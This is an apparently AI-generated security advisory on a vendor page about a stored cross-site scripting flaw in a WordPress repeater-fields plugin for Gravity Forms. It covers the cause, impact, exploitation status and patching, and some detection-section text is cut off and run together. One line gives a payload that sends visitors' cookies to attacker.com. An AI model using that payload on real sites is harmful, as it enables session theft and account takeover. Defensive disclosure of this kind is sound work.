
PEACH
Un framework di isolamento del tenant
CVE-2026-84293 is a Stored Cross-Site Scripting (XSS) vulnerability in the Repeater Fields for Gravity Forms plugin for WordPress, affecting all versions up to and including 3.0.4. The flaw exists in multi-input sub-field types within repeater fields (such as Name, Address, and Checkbox fields) due to insufficient input sanitization and output escaping. It was published on September 9, 2026, with a patch made available the same day. The vulnerability carries a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The vulnerability specifically affects multi-input sub-field types within repeater fields; scalar single-input field values are properly escaped using WordPress's esc_html() function at the output stage in version 3.0.4, but multi-input sub-fields (e.g., Name, Address, Checkbox) lack equivalent sanitization. An unauthenticated attacker can submit a crafted form entry containing malicious JavaScript payloads into these sub-fields, which are then stored in the database and rendered unsanitized when any user views the affected page. Vulnerable code paths have been identified in repeater_field.php at lines L401, L474, L543, and L549 (GitHub Advisory, WordPress Trac).
Successful exploitation allows an unauthenticated attacker to persistently inject arbitrary JavaScript into WordPress pages, which executes in the browsers of any user who visits the affected page — including administrators. This can lead to session cookie theft, credential harvesting, unauthorized administrative actions (such as creating rogue admin accounts), defacement, or redirection to malicious sites. The scope is marked as "Changed" in the CVSS scoring, reflecting that the injected script can impact users and resources beyond the vulnerable plugin itself (GitHub Advisory, Wordfence).
As of the disclosure date (September 9, 2026), there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation. The EPSS score is reported as 0.0, indicating a currently low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Wordfence, GitHub Advisory).
wp-content/plugins/repeater-for-gravity-forms/) via web crawlers or tools like WPScan.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>, to be injected into one of the multi-input sub-field values.<script>, onerror=, javascript:).wp_gf_entry_meta table containing raw HTML or JavaScript in multi-input sub-field values (Name, Address, Checkbox sub-fields) rather than plain text (GitHub Advisory, Wordfence).Update the Repeater Fields for Gravity Forms plugin to a version later than 3.0.4, which includes the patch released on September 9, 2026. As a temporary workaround, site administrators can disable or restrict access to forms containing repeater fields with multi-input sub-field types until the update is applied. Additionally, deploying a Web Application Firewall (WAF) with XSS detection rules (e.g., Wordfence, Cloudflare) can help block malicious payloads. Administrators should also review existing form submissions for signs of injected content and sanitize any affected entries (GitHub Advisory, Wordfence).
The vulnerability was assigned and disclosed by Wordfence, a leading WordPress security firm, as part of their threat intelligence program. No notable independent researcher commentary, social media discussion, or broader media coverage has been identified at this time, consistent with the low EPSS score and absence of public exploit code (Wordfence).
Fonte: Questo report è stato generato utilizzando l'intelligenza artificiale
Valutazione gratuita delle vulnerabilità
Valuta le tue pratiche di sicurezza cloud in 9 domini di sicurezza per confrontare il tuo livello di rischio e identificare le lacune nelle tue difese.
Richiedi una demo personalizzata
"La migliore esperienza utente che abbia mai visto offre piena visibilità ai carichi di lavoro cloud."
"Wiz fornisce un unico pannello di controllo per vedere cosa sta succedendo nei nostri ambienti cloud."
"Sappiamo che se Wiz identifica qualcosa come critico, in realtà lo è."